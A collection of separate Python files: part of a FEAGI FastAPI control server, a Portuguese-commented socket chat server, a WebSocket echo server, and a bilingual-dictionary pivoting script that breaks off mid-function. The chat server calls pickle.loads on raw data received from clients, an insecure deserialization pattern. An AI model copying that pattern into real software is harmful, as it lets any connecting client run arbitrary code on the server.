gazebo_host: Optional[str] = runtime_data.parameters['Sockets']['gazebo_host_name']
gazebo_data_port: Optional[int] = runtime_data.parameters['Sockets']['feagi_inbound_port_gazebo']
gazebo_web_port: Optional[int] = 6080
virtual_stimulator_host: Optional[str] = runtime_data.parameters['Sockets']['virtual_host_name']
virtual_stimulator_data_port: Optional[int] = runtime_data.parameters['Sockets']['feagi_inbound_port_virtual']
class ConnectomePath(BaseModel):
connectome_path: str
class Registration(BaseModel):
source: str
host: str
capabilities: dict
class Stats(BaseModel):
neuron_stat_collection: Optional[bool] = False
synapse_stat_collection: Optional[bool] = False
class Genome(BaseModel):
genome: dict
class SPAStaticFiles(StaticFiles):
async def get_response(self, path: str, scope):
response = await super().get_response(path, scope)
print("<><><><><><>")
if response.status_code == 404:
print("-=-=-=-=-=-=-=-=-=-=")
response = await super().get_response('.', scope)
return response
app.mount("/home", SPAStaticFiles(directory="gui", html=True), name="static")
# @app.api_route("/v1/feagi/feagi/launch", methods=['POST'])
# async def feagi_management():
# try:
# print("message:", message)
# connectome_overwrite_path = message.existing_connectome
# feagi_thread = Thread(target=start_feagi, args=(api_queue, connectome_overwrite_path,))
# feagi_thread.start()
#
# if message.existing_connectome:
# return {"FEAGI started using an existing connectome."}
# else:
# return {"FEAGI started using a genome."}
# except Exception as e:
# return {"FEAGI start failed ... error details to be provided here", e}
@app.api_route("/v1/feagi/feagi/register", methods=['POST'])
async def feagi_registration(message: Registration):
try:
message = message.dict()
source = message['source']
host = message['host']
capabilities = message['capabilities']
print("########## ###### >>>>>> >>>> ", source, host, capabilities)
return {"Registration was successful"}
except Exception as e:
return {"FEAGI start failed ... error details to be provided here", e}
@app.api_route("/v1/feagi/feagi/logs", methods=['POST'])
async def log_management(message: Logs):
try:
message = message.dict()
message = {"log_management": message}
api_queue.put(item=message)
return {"Request sent!"}
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/feagi/burst_engine/stimulation_period", methods=['GET'])
async def burst_engine_params():
try:
return runtime_data.burst_timer
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/feagi/gui_baseline/ipu", methods=['GET'])
async def supported_ipu_list():
try:
return gui_baseline['ipu']
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/feagi/gui_baseline/opu", methods=['GET'])
async def supported_opu_list():
try:
return gui_baseline['opu']
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/feagi/gui_baseline/morphology", methods=['GET'])
async def supported_morphology_list():
try:
return gui_baseline['morphology']
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/feagi/gui_baseline/cortical-genes", methods=['GET'])
async def supported_cortical_genes_list():
try:
return gui_baseline['cortical_genes']
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/feagi/gui_baseline/morphology-scalar", methods=['GET'])
async def supported_cortical_genes_list():
try:
return gui_baseline['morphology_scalar']
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/feagi/gui_baseline/psc-multiplier", methods=['GET'])
async def supported_cortical_genes_list():
try:
return gui_baseline['postSynapticCurrent_multiplier']
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/feagi/gui_baseline/plasticity-flag", methods=['GET'])
async def supported_cortical_genes_list():
try:
return gui_baseline['plasticity_flag']
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/feagi/pns/ipu", methods=['GET'])
async def ipu_list():
try:
return runtime_data.ipu_list
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/feagi/pns/opu", methods=['GET'])
async def ipu_list():
try:
return runtime_data.opu_list
except Exception as e:
return {"Request failed...", e}
# ###### Burst-Engine Endpoints #########
# ##################################
@app.api_route("/v1/feagi/feagi/burst_engine/burst_counter", methods=['GET'])
async def burst_engine_params():
try:
return runtime_data.burst_count
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/feagi/burst_engine", methods=['POST'])
async def burst_management(message: BurstEngine):
try:
message = message.dict()
message = {'burst_management': message}
api_queue.put(item=message)
return {"Request sent!"}
except Exception as e:
return {"Request failed...", e}
# ###### Networking Endpoints #########
# ##################################
@app.api_route("/v1/feagi/feagi/network", methods=['GET'])
async def network_management():
try:
return runtime_data.parameters['Sockets']
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/feagi/network", methods=['POST'])
async def network_management(message: Network):
try:
message = message.dict()
message = {'network_management': message}
api_queue.put(item=message)
return runtime_data.parameters['Sockets']
except Exception as e:
return {"Request failed...", e}
# ###### Connectome Endpoints #########
# ##################################
@app.post("/v1/feagi/connectome/upload")
async def connectome_file_upload(file: UploadFile = File(...)):
try:
data = await file.read()
connectome_str = data.decode("utf-8").split(" = ")[1]
connectome = literal_eval(connectome_str)
message = {"connectome": connectome}
api_queue.put(item=message)
return {"Connectome received as a file"}
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/connectome/source", methods=['POST'])
async def connectome_source_path(connectome_path: ConnectomePath):
try:
feagi_thread = Thread(target=start_feagi, args=(api_queue, 'connectome', 'path', connectome_path,))
feagi_thread.start()
return {"Request sent!"}
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/connectome/snapshot", methods=['POST'])
async def connectome_snapshot(message: ConnectomePath):
try:
message = message.dict()
message = {'connectome_snapshot': message}
print("Snapshot path:", message)
api_queue.put(item=message)
return {"Request sent!"}
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/connectome/properties/dimensions", methods=['GET'])
async def connectome_report():
print("cortical_dimensions", runtime_data.cortical_dimensions)
try:
return runtime_data.cortical_dimensions
except Exception as e:
return {"Request failed...", e}
# ###### Genome Endpoints #########
# ##################################
@app.post("/v1/feagi/genome/upload/file")
async def genome_file_upload(file: UploadFile = File(...)):
try:
data = await file.read()
genome_str = data.decode("utf-8").split(" = ")[1]
genome = literal_eval(genome_str)
feagi_thread = Thread(target=start_feagi, args=(api_queue, 'genome', '', genome,))
feagi_thread.start()
return {"Genome received as a file"}
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/genome/upload/default", methods=['POST'])
async def genome_string_upload():
try:
genome = static_genome.genome
print("default_genome", genome)
feagi_thread = Thread(target=start_feagi, args=(api_queue, 'genome', '', genome,))
feagi_thread.start()
return {"FEAGI started using a genome string."}
except Exception as e:
return {"FEAGI start using genome string failed ...", e}
@app.api_route("/v1/feagi/genome/upload/string", methods=['POST'])
async def genome_string_upload(genome: Genome):
try:
feagi_thread = Thread(target=start_feagi, args=(api_queue, 'genome', '', genome.genome,))
feagi_thread.start()
return {"FEAGI started using a genome string."}
except Exception as e:
return {"FEAGI start using genome string failed ...", e}
# ###### Statistics and Reporting Endpoints #########
# ##################################
@app.api_route("/v1/feagi/stats", methods=['POST'])
async def stat_management(message: Stats):
try:
message = message.dict()
message = {'stats': message}
api_queue.put(item=message)
return {"Request sent!"}
except Exception as e:
return {"Request failed...", e}
def api_message_processor(api_message):
"""
Processes the incoming API calls to FEAGI
"""
if 'burst_management' in api_message:
if 'burst_duration' in api_message['burst_management']:
if api_message['burst_management']['burst_duration'] is not None:
runtime_data.burst_timer = api_message['burst_management']['burst_duration']
if 'log_management' in api_message:
if 'print_burst_info' in api_message['log_management']:
runtime_data.parameters['Logs']['print_burst_info'] \
= api_message['log_management']['print_burst_info']
if 'print_messenger_logs' in api_message['log_management']:
runtime_data.parameters['Logs']['print_messenger_logs'] \
= api_message['log_management']['print_messenger_logs']
if 'connectome_snapshot' in api_message:
if 'connectome_path' in api_message['connectome_snapshot']:
if api_message['connectome_snapshot']['connectome_path']:
print("Taking a snapshot of the brain... ... ...")
disk_ops.save_brain_to_disk(connectome_path=api_message['connectome_snapshot']['connectome_path'],
type='snapshot')
else:
disk_ops.save_brain_to_disk()
if 'stats' in api_message:
if 'neuron_stat_collection' in api_message['stats'] and \
api_message['stats']['neuron_stat_collection'] is not None:
if api_message['stats']['neuron_stat_collection']:
runtime_data.collect_neuron_stats = True
print("Starting to capture neuronal activity stats into database...")
else:
runtime_data.collect_neuron_stats = False
print("Stopping the capture of neuronal activity stats into database.")
if 'synapse_stat_collection' in api_message['stats'] and \
api_message['stats']['synapse_stat_collection'] is not None:
if api_message['stats']['synapse_stat_collection']:
runtime_data.collect_synapse_stats = True
print("Starting to capture synaptic activity stats into database...")
else:
runtime_data.collect_synapse_stats = False
print("Stopping the capture of synaptic activity stats into database.")
if 'network_management' in api_message:
print("api_message", api_message)
if 'godot_host' in api_message['network_management']:
runtime_data.parameters['Sockets']['godot_host_name'] = api_message['network_management']['godot_host']
if 'godot_port' in api_message['network_management']:
runtime_data.parameters['Sockets']['feagi_inbound_port_godot'] = \
api_message['network_management']['godot_port']
if 'gazebo_host' in api_message['network_management']:
runtime_data.parameters['Sockets']['gazebo_host_name'] = api_message['network_management']['gazebo_host']
if 'gazebo_port' in api_message['network_management']:
runtime_data.parameters['Sockets']['feagi_inbound_port_gazebo'] = \
api_message['network_management']['gazebo_port']
if 'virtual_host' in api_message['network_management']:
runtime_data.parameters['Sockets']['virtual_host_name'] = api_message['network_management'][
'virtual_host']
if 'virtual_port' in api_message['network_management']:
runtime_data.parameters['Sockets']['feagi_inbound_port_virtual'] = \
api_message['network_management']['virtual_port']
# if 'genome' in api_message:
# pass
# todo: Handle web port assignments
|
server.py
|
"""
Server recebe novas conexoes de usuarios a qualquer momento.
Tambem fica responsavel pela parte do processamento de listar os usuarios ativos
"""
from constants import CMD_CHAT, CMD_LIST_USERS, CMD_QUIT, SERVER_NAME, SERVER_PORT
import sys
import socket
import threading
import select as s
from datetime import datetime
import pickle
from message import Message
HOST = ''
# Entradas para escuta do select
entry_points = [sys.stdin]
# Mapa de conexoes com o servidor
connections = {}
# Lock para acessar o dicionario de conexoes
lock = threading.Lock()
# Map de username para socket
usernames = dict()
def initServer():
"""Inicia o socket: internet IPv4 + TCP"""
# Default: socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sckt = socket.socket() # Descritor socket
sckt.bind((HOST, SERVER_PORT))
sckt.listen(10)
# Medida preventiva contra falhas entre a chamada de s.select() e sckt.accept()
sckt.setblocking(False)
return sckt
def acceptConnection(sckt):
"""Aceita a conexao com o cliente"""
global usernames
newSckt, address = sckt.accept()
while True:
data = newSckt.recv(1024)
message: Message = pickle.loads(data)
new_username = message.content
if new_username not in usernames.keys() and new_username != SERVER_NAME:
lock.acquire()
usernames[message.content] = newSckt
lock.release()
response = Message(SERVER_NAME, new_username, True, datetime.now())
newSckt.send(pickle.dumps(response))
break
else:
response = Message(SERVER_NAME, None, False, datetime.now())
newSckt.send(pickle.dumps(response))
welcome_msg = Message(SERVER_NAME, message.content,
f'Bem vindo {message.content}! Aqui está a lista dos usuários disponíveis: {list(usernames.keys())}\n'
f'Para iniciar um chat basta digitar "{CMD_CHAT} <USER_NAME>"', datetime.now())
newSckt.send(pickle.dumps(welcome_msg))
print(f'Conectado com: {str(address)}, username: {message.content}') # Log de conexao com endereco <address>
return newSckt, address
def internalCommandHandler(cmd: str, sckt, clients: list):
if cmd == CMD_QUIT:
print('!-----AVISO-----!')
print('Servidor está fechado para novas conexões. Aguardando clientes desconectarem...')
sckt.close()
sys.exit()
elif cmd in CMD_LIST_USERS:
pass #user_list = listActiveUsers()
def requestHandler(cliSckt, address):
"""Recebe requests dos clientes conectados"""
# Recebe uma mensagem
# se o receiver for SERVER, então é um comando. tem que tratar
# se o receiver for outro, então é uma mensagem pra alguém. acessa o map de user e redireciona
while True:
data = cliSckt.recv(1024)
# Se o usuário terminou de forma inesperada
if not data:
sender = list(usernames.keys())[list(usernames.values()).index(cliSckt)]
print(f'O usuário {sender} encerrou de forma inesperada.')
lock.acquire()
usernames.pop(sender)
lock.release()
cliSckt.close()
break
message: Message = pickle.loads(data)
if message.receiver == 'SERVER':
if message.content in CMD_LIST_USERS:
response = Message('SERVER', message.sender, list(usernames.keys()), datetime.now())
usernames[message.sender].send(pickle.dumps(response))
print(f'Lista de usuários enviada para {message.sender}')
elif message.content == CMD_QUIT:
# Garante que o server pode enviar o ack apos deletar registros do cliente
sender = message.sender
sender_sock = usernames[sender]
# Envia sinal de acknowladge para que cliente desconecte: 200 = OK, 500 = Erro
lock.acquire()
if usernames.pop(sender, False):
print(f'O usuário {message.sender} encerrou com sucesso.')
lock.release()
response = Message('SERVER', sender, '200', datetime.now())
sender_sock.send(pickle.dumps(response))
cliSckt.close()
break
else:
lock.release()
response = Message('SERVER', sender, '500', datetime.now())
sender_sock.send(pickle.dumps(response))
else:
if message.receiver not in usernames.keys():
response = Message(SERVER_NAME, message.sender,
f'O usuário {message.receiver} não existe ou está inativo.', datetime.now())
cliSckt.send(pickle.dumps(response))
else:
addressee_sock = usernames[message.receiver]
addressee_sock.send(data)
def main():
sckt = None
try:
sckt = initServer()
print('Pronto para receber conexoes...')
print(f'Para encerrar o servico, digite "{CMD_QUIT}".')
entry_points.append(sckt)
# Lista de threads ativas
client_threads = []
while True:
r, w, x = s.select(entry_points, [], [])
for ready in r:
if ready == sckt:
# Aceita a conexao
client_sckt, client_addr = acceptConnection(sckt)
# Cria a nova thread que ira lidar com a conexao
client = threading.Thread(target=requestHandler, args=(client_sckt, client_addr))
client.start()
# Adiciona a nova thread na lista de threads ativas
client_threads.append(client)
# Protecao contra alteracoes problematicas por multithreading
lock.acquire()
connections[client_sckt] = client_addr # Adiciona a conexao nova ao mapa de conexoes
lock.release()
elif ready == sys.stdin:
# Permite interacao com o servidor
cmd = input()
internalCommandHandler(cmd, sckt, client_threads)
except socket.error as e:
print('Erro: %s' % e)
sys.exit()
finally:
if sckt:
sckt.close()
pass
if __name__ == "__main__":
main()
|
main.py
|
import socket
import threading
import ws
def connect():
print("Connect")
def recv(dt):
print(f"Echo: {dt}")
ws.send(f"Echo: {dt}")
def disconnect():
print("Close")
try:
cfg=socket.getaddrinfo("0.0.0.0",8080,0,socket.SOCK_STREAM,socket.IPPROTO_TCP,socket.AI_PASSIVE)[0]
ss=socket.socket(cfg[0],cfg[1],cfg[2])
ss.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
ss.bind(cfg[4])
ss.listen(5)
print("WS Server Started on Port 8080!")
while (True):
cs,a=ss.accept()
threading.Thread(target=ws.handle,args=(cs,connect,recv,disconnect)).start()
except KeyboardInterrupt:
ss.stop()
|
pivot_apertium.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
PivotAlign: A system for inducing bilingual dictionaries
from parallel texts and pre-existing dictionaries for other language pairs.
Script for pivoting through the Apertium dictionaries to create a candidate list
Copyright (C) 2021 Steinþór Steingrímsson.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
__license__ = "Apache 2.0"
#TODO: Some adaption unfinished for final published version.
# Get translations sets through pivoting
# Pairs: en/fr fr/pt pt/en
# One pivot for en/fr:
# en/eo - eo/fr; en-es - es/fr; en/ca - ca/fr
import multiprocessing
import sys
from os import path
import itertools
import os
import time
from collections import Counter
from queue import Queue
from threading import Thread
from threading import Lock
from multiprocessing import Process, Manager
transset_folder = "/home/steinst/tiad2021/"
dict_of_dicts = Manager().dict()
dict_of_lists = {}
syn_ratio_threshold = 0.4
synonyms = {}
## Gera lúppu sem fer í gegnum öll pörin
## Eftir að öll pörin eru komin, pivota þá í gegnum lokapörin
## Keyra svo út niðurstöður (með POS-tagi líka)
##
## Samþykkja öll proper nouns? skor=1 ? (eða skor = 1 þar sem þau eru nákvæmlega eins skrifuð)
## samþykkja öll alignment sem finnast og setja skor á þau
## ef öðrumegin er mwe, greppa þá stóru parallel-skrána og samþykkja það sem finnst: skor=1
pathway = sys.argv[1]
addsynonym = int(sys.argv[2])
pos_dict = {}
accepted_dict = {}
suggestions_dict = {}
def create_pair_dict(src, trg):
src_trg_dict = {}
trg_src_dict = {}
src_list = []
trg_list = []
pair_name = 'TransSet' + src.upper() + '-' + trg.upper() + '.csv'
if not path.exists(transset_folder + pair_name):
pair_name = 'TransSet' + trg.upper() + '-' + src.upper() + '.csv'
with open(transset_folder + pair_name, 'r') as pair_in:
for line in pair_in:
if not line.lstrip().startswith('"written_rep_a"'):
try:
line_list = line.strip().split('" , "')
src_rep = line_list[0].lstrip('"')
trg_rep = line_list[6]
src_entry = line_list[1] + '__' + src_rep
trg_entry = line_list[5] + '__' + trg_rep
POS = line_list[7].strip().strip(" ,")
pos_dict[src_entry] = POS
pos_dict[trg_entry] = POS
src_list.append(src_entry)
trg_list.append(trg_entry)
if src_entry in src_trg_dict.keys():
src_trg_dict[src_entry].append([src_rep, trg_entry, trg_rep, POS])
else:
src_trg_dict[src_entry] = [[src_rep, trg_entry, trg_rep, POS]]
if trg_entry in trg_src_dict.keys():
trg_src_dict[trg_entry].append([trg_rep, src_entry, src_rep, POS])
else:
trg_src_dict[trg_entry] = [[trg_rep, src_entry, src_rep, POS]]
except Exception as e:
pass
src_list = list(set(src_list))
trg_list = list(set(trg_list))
return src_trg_dict, trg_src_dict, src_list, trg_list
def pivot(*pairs):
first_dict = True
out_dict = {}
for pair in pairs:
if first_dict:
previous_dict = dict_of_dicts[pair]
out_dict = previous_dict.copy()
first_dict = False
else:
working_dict = dict_of_dicts[pair]
out_dict = {}
for key in previous_dict.keys():
trans_list = previous_dict[key]
for t in trans_list:
translation = t[1]
try:
#print(translation)
pivot_translation = working_dict[translation]
for pt in pivot_translation:
if key in out_dict.keys():
out_dict[key].append(pt)
else:
out_dict[key] = [pt]
except:
pass
previous_dict = out_dict.copy()
return out_dict
def pivot_path(path_dict):
pivot_paths = path_dict.keys()
for pivots in pivot_paths:
print('pivoting ' + pivots)
src_lang, trg_lang = pivots.split('_')
out_list = []
for curr_pivot in path_dict[pivots]:
curr_dict = pivot(*curr_pivot)
for key in curr_dict.keys():
translations = curr_dict[key]
for i in translations:
word = key.split('__')[1]
out_list.append(word + '\t' + i[2] + '\t' + key + '\t' + i[1] + '\t' + i[3] + '\n')
out_list = list(set(out_list))
try:
temp_src = dict_of_dicts[src_lang + '_' + trg_lang].copy()
except:
temp_src = {}
try:
temp_trg = dict_of_dicts[trg_lang + '_' + src_lang].copy()
except:
temp_trg = {}
for i in out_list:
src_rep, trg_rep, src_entry, trg_entry, POS = i.strip().split('\t')
src_key = src_entry # + '__' + src_rep
trg_key = trg_entry # + '__' + trg_rep
if src_key in temp_src.keys():
temp_src[src_key].append([src_rep, trg_entry, trg_rep, POS])
temp_src[src_key].sort()
temp_src[src_key] = list(temp_src[src_key] for temp_src[src_key], _ in itertools.groupby(temp_src[src_key]))
else:
temp_src[src_key] = [[src_rep, trg_entry, trg_rep, POS]]
if trg_key in temp_trg.keys():
temp_trg[trg_key].append([trg_rep, src_entry, src_rep, POS])
temp_trg[trg_key].sort()
temp_trg[trg_key] = list(temp_trg[trg_key] for temp_trg[trg_key],_ in itertools.groupby(temp_trg[trg_key]))
else:
temp_trg[trg_key] = [[trg_rep, src_entry, src_rep, POS]]
dict_of_dicts[src_lang + '_' + trg_lang] = temp_src.copy()
dict_of_dicts[trg_lang + '_' + src_lang] = temp_trg.copy()
def pivot_path_dict():
# Add synonym lookup
while True:
try:
pivots, path_dict = q.get()
print('pivoting ' + pivots)
src_lang, trg_lang = pivots.split('_')
out_list = []
for curr_pivot in path_dict[pivots]:
print(curr_pivot)
curr_dict = pivot(*curr_pivot)
for key in curr_dict.keys():
translations = curr_dict[key]
for i in translations:
word = key.split('__')[1]
out_list.append(
word + '\t' + i[2] + '\t' + key + '\t' + i[1] + '\t' + i[3] + '\n')
if addsynonym > 0:
try:
trans_syns = synonyms[i[1]]
for j in trans_syns:
if pos_dict[j] == pos_dict[key]:
word = j.split('__')[1]
out_list.append(word + '\t' + i[2] + '\t' + j + '\t' + i[1] + '\t' + pos_dict[j] + '\n')
except:
pass
try:
source_syns = synonyms[key]
for j in source_syns:
if pos_dict[j] == pos_dict[key]:
word = j.split('__')[1]
out_list.append(word + '\t' + i[2] + '\t' + j + '\t' + i[1] + '\t' + pos_dict[j] + '\n')
except:
pass
out_list = list(set(out_list))
try:
temp_src = dict_of_dicts[src_lang + '_' + trg_lang].copy()
except:
temp_src = {}
try:
temp_trg = dict_of_dicts[trg_lang + '_' + src_lang].copy()
except:
temp_trg = {}
for i in out_list:
src_rep, trg_rep, src_entry, trg_entry, POS = i.strip().split('\t')
src_key = src_entry #+ '__' + src_rep
trg_key = trg_entry #+ '__' + trg_rep
if src_key in temp_src.keys():
temp_src[src_key].append([src_rep, trg_entry, trg_rep, POS])
#temp_src[src_key] = list(set(temp_src[src_key]))
temp_src[src_key].sort()
temp_src[src_key] = list(temp_src[src_key] for temp_src[src_key], _ in itertools.groupby(temp_src[src_key]))
else:
temp_src[src_key] = [[src_rep, trg_entry, trg_rep, POS]]
if trg_key in temp_trg.keys():
temp_trg[trg_key].append([trg_rep, src_entry, src_rep, POS])
#temp_trg[trg_key] = list(set(temp_trg[trg_key]))
temp_trg[trg_key].sort()
temp_trg[trg_key] = list(temp_trg[trg_key] for temp_trg[trg_key], _ in itertools.groupby(temp_trg[trg_key]))
else:
temp_trg[trg_key] = [[trg_rep, src_entry, src_rep, POS]]
dict_of_dicts[src_lang + '_' + trg_lang] = temp_src.copy()
dict_of_dicts[trg_lang + '_' + src_lang] = temp_trg.copy()
q.task_done()
except Queue.Empty:
return
def get_lang_words(lang, *pairs):
all_words_out = []
for i in pairs:
src, trg = i
pair_name = 'TransSet' + src.upper() + '-' + trg.upper() + '.csv'
with open(transset_folder + pair_name, 'r') as pair_in:
for line in pair_in:
if not line.startswith('"written_rep_a"'):
try:
line_list = line.strip().split('" , "')
src_rep = line_list[0].lstrip('"')
trg_rep = line_list[6]
src_entry = line_list[1]
trg_entry = line_list[5]
if lang == src:
all_words_out.append(src_entry)
else:
all_words_out.append(trg_entry)
except:
pass
return all_words_out
def work_pair(p, dict_of_dicts):
try:
dict_a, dict_b, list_a, list_b = create_pair_dict(p[0], p[1])
dict_of_dicts[p[0] + '_' + p[1]] = dict_a.copy()
dict_of_dicts[p[1] + '_' + p[0]] = dict_b.copy()
for a in list_a:
try:
dict_of_lists[p[0]].append(a)
except:
dict_of_lists[p[0]] = [a]
dict_of_lists[p[0]] = list(set(dict_of_lists[p[0]]))
for b in list_b:
try:
dict_of_lists[p[1]].append(b)
except:
dict_of_lists[p[1]] = [b]
dict_of_lists[p[1]] = list(set(dict_of_lists[p[1]]))
return
except Exception as e:
print(e)
return
def att_otac(p, dict_of_dicts):
try:
otac_ctr = 0
src_w = p[0]
trg_w = p[1]
o_pairs = pairs.copy()
for o in o_pairs:
if o[0] == src_w:
s_i = o[0] + '_' + o[1]
i_t = o[1] + '_' + trg_w
i_s = o[1] + '_' + o[0]
t_i = trg_w + '_' + o[1]
elif o[1] == src_w:
s_i = o[1] + '_' + o[0]
i_s = o[0] + '_' + o[1]
i_t = o[0] + '_' + trg_w
t_i = trg_w + '_' + o[0]
elif o[0] == trg_w:
i_t = o[1] + '_' + o[0]
t_i = o[0] + '_' + o[1]
s_i = src_w + '_' + o[1]
i_s = o[1] + '_' + src_w
elif o[1] == trg_w:
s_i = src_w + '_' + o[0]
i_s = o[0] + '_' + src_w
i_t = o[0] + '_' + o[1]
t_i = o[1] + '_' + o[0]
else:
continue
try:
s_i_dict = dict_of_dicts[s_i].copy()
i_s_dict = dict_of_dicts[i_s].copy()
i_t_dict = dict_of_dicts[i_t].copy()
t_i_dict = dict_of_dicts[t_i].copy()
#print(p, o, 'inni')
except:
continue
out_dict = {}
non_ec_dict = {}
s_t = src_w + '_' + trg_w
info_dict = {}
temp_s_i_ctr = 0
for s_i_key in s_i_dict.keys():
si_set = []
si_dict = {}
ti_set = []
tr_dict = {}
try:
temp_s_i_ctr += 1
#if temp_s_i_ctr % 5000 == 0:
# print(s_t, str(temp_s_i_ctr), str(len(s_i_dict.keys())))
if True:
counter_list = []
trans_list = s_i_dict[s_i_key]
for si in trans_list:
s_rep, i_t_key, si_rep, si_pos = si
si_set.append(i_t_key)
si_dict[i_t_key] = {'s_rep': s_rep, 'si_rep': si_rep, 'si_pos': si_pos}
info_dict[s_i_key] = [s_rep, si_pos]
for it_list in si_set:
counter_dict = {}
one2oneFlag = False
try:
it_set = []
ti_set = []
it_dict = {}
inverse_list = i_t_dict[it_list]
for it in inverse_list:
i_rep, t_key, t_rep, it_pos = it
it_set.append(t_key)
it_dict[t_key] = {'i_rep': i_rep, 't_rep': t_rep, 'it_pos': it_pos}
for ti in t_i_dict[t_key]:
ti_set.append(ti[1])
tr_dict[ti[1]] = {'t_rep': ti[0], 't_pos': ti[3]}
if ti[1] in counter_dict.keys():
counter_dict[ti[1]].append(t_key)
else:
counter_dict[ti[1]] = [t_key]
#print(t_key)
info_dict[t_key] = [ti[0], ti[3]]
common = list(set(si_set).intersection(ti_set))
for i in common:
counter_list.append(i)
if len(si_set) == len(it_set) == 1:
one2oneFlag = True
if si_dict[it_list]['si_pos'] == it_pos:
if s_i_key in out_dict:
out_dict[s_i_key].append(t_key)
else:
out_dict[s_i_key] = [t_key]
except:
pass
if one2oneFlag == False:
counted = Counter(counter_list)
#print(counted)
for ctd in counted.keys():
if counted[ctd] > 0:
trans_otic = []
#print(counter_dict)
for it in counter_dict.keys():
for t_ot in counter_dict[it]:
#print(t_ot)
trans_otic.append(t_ot)
t_counted = Counter(trans_otic)
for t_out in t_counted:
if t_counted[t_out] > 0:
if s_i_key in out_dict:
out_dict[s_i_key].append(t_out)
else:
out_dict[s_i_key] = [t_out]
# for ti_sets in t_i_dict[t_key]:
# ti_set.append(ti_sets[1])
#
# common = list(set(si_set).intersection(ti_set))
# if len(common) > 1:
# if s_i_key in out_dict:
# out_dict[s_i_key].append(t_key)
# else:
# out_dict[s_i_key] = [t_key]
# info_dict[t_key] = [t_rep, it_pos]
# info_dict[s_i_key] = [s_rep, si_pos]
#else:
# if s_i_key in non_ec_dict:
# non_ec_dict[s_i_key].append(t_key)
# else:
# non_ec_dict[s_i_key] = [t_key]
# except:
# # Ekkert fannst - hvað gera bændur?
# pass
except Exception as e:
pass
# print(e)
if s_t not in dict_of_dicts.keys():
dict_of_dicts[s_t] = {}
s_t_dict = dict_of_dicts[s_t].copy()
#print(s_t)
#if s_t in ('en_fr', 'fr_en', 'pt_en', 'en_pt'):
# print(s_t, 'length')
# print(len(dict_of_dicts[s_t].keys()))
#print(len(info_dict.keys()))
keyctr = 0
#print(len(out_dict.keys()))
for key in out_dict.keys():
pass
#print(key)
#print(out_dict[key])
#for t_key in out_dict[key]:
# pass
#print(t_key)
for key in out_dict.keys():
#print(key)
#print(info_dict[key])
#print(out_dict[key])
#keyctr += 1
#if keyctr % 1000 == 0:
# print(s_t, keyctr, len(list(out_dict.keys())))
for t_key in out_dict[key]:
#print(t_key)
#print(info_dict[t_key])
if key in s_t_dict.keys():
otac_ctr += 1
s_t_dict[key].append([info_dict[key][0], t_key, info_dict[t_key][0], info_dict[key][1]])
else:
#temp_list = [info_dict[key][0], info_dict[t_key][0], t_key, info_dict[key][1]]
#dict_of_dicts[s_t][key].append(temp_list)
s_t_dict[key] = [[info_dict[key][0], t_key, info_dict[t_key][0], info_dict[key][1]]]
#print(temp_list)
#print(info_dict[key][0], info_dict[t_key][0])
#print(s_i_key)
#if s_t == 'en_fr':
# print(dict_of_dicts[s_t])
#if s_t in ('en_fr', 'fr_en', 'pt_en', 'en_pt'):
#print('in dict')
#print(dict_of_dicts[s_t][key])
#s_t_dict[key] = list(s_t_dict[key] for s_t_dict[key], _ in itertools.groupby(s_t_dict[key]))
#print(e)
#pass
#print('villa')
#print(e)
#Ekkert fannst - hvað gera bændur?
dict_of_dicts[s_t] = s_t_dict.copy()
#print(s_t)
#if s_t in ('en_fr', 'fr_en', 'pt_en', 'en_pt'):
# print(s_t, 'length')
# print(len(dict_of_dicts[s_t].keys()))
return
except:
return
def add_selected_syn():
while True:
try:
p = q.get()
temp_dict = {}
total_dict = {}
syn_dict = {}
src_w = p[0]
trg_w = p[1]
o_pairs = other_pairs.copy()
o_pairs.remove(p)
s3 = src_w + '_' + trg_w
t3 = trg_w + '_' + src_w
temp_dict_s = {}
for src in (src_w, trg_w):
# for o in other_pairs:
# if o[0] == src:
# s1 = o[0] + '_' + o[1]
# temp_dict[s1] = dict_of_dicts[s1].copy()
# s2 = o[1] + '_' + o[0]
# temp_dict[s2] = dict_of_dicts[s2].copy()
# elif o[1] == src:
# s1 = o[1] + '_' + o[0]
# temp_dict[s1] = dict_of_dicts[s1].copy()
# s2 = o[0] + '_' + o[1]
# temp_dict[s2] = dict_of_dicts[s2].copy()
pair_ctr = 0
for o in o_pairs:
temp_pair_dict = {}
if o[0] == src:
pair_ctr += 1
s1 = o[0] + '_' + o[1]
s2 = o[1] + '_' + o[0]
curr = dict_of_dicts[s1].copy()
rev = dict_of_dicts[s2].copy()
for curr_key in curr.keys():
if curr_key not in temp_pair_dict.keys():
temp_pair_dict[curr_key] = {}
for translation in curr[curr_key]:
src_word, trg_key, trg_word, pos = translation
for backtrans in rev[trg_key]:
backtrans_key = backtrans[1]
if backtrans_key in temp_pair_dict[curr_key].keys():
temp_pair_dict[curr_key][backtrans_key] += 1
else:
temp_pair_dict[curr_key] = {backtrans_key: 1}
elif o[1] == src:
pair_ctr += 1
s2 = o[0] + '_' + o[1]
s1 = o[1] + '_' + o[0]
curr = dict_of_dicts[s1].copy()
rev = dict_of_dicts[s2].copy()
for curr_key in curr.keys():
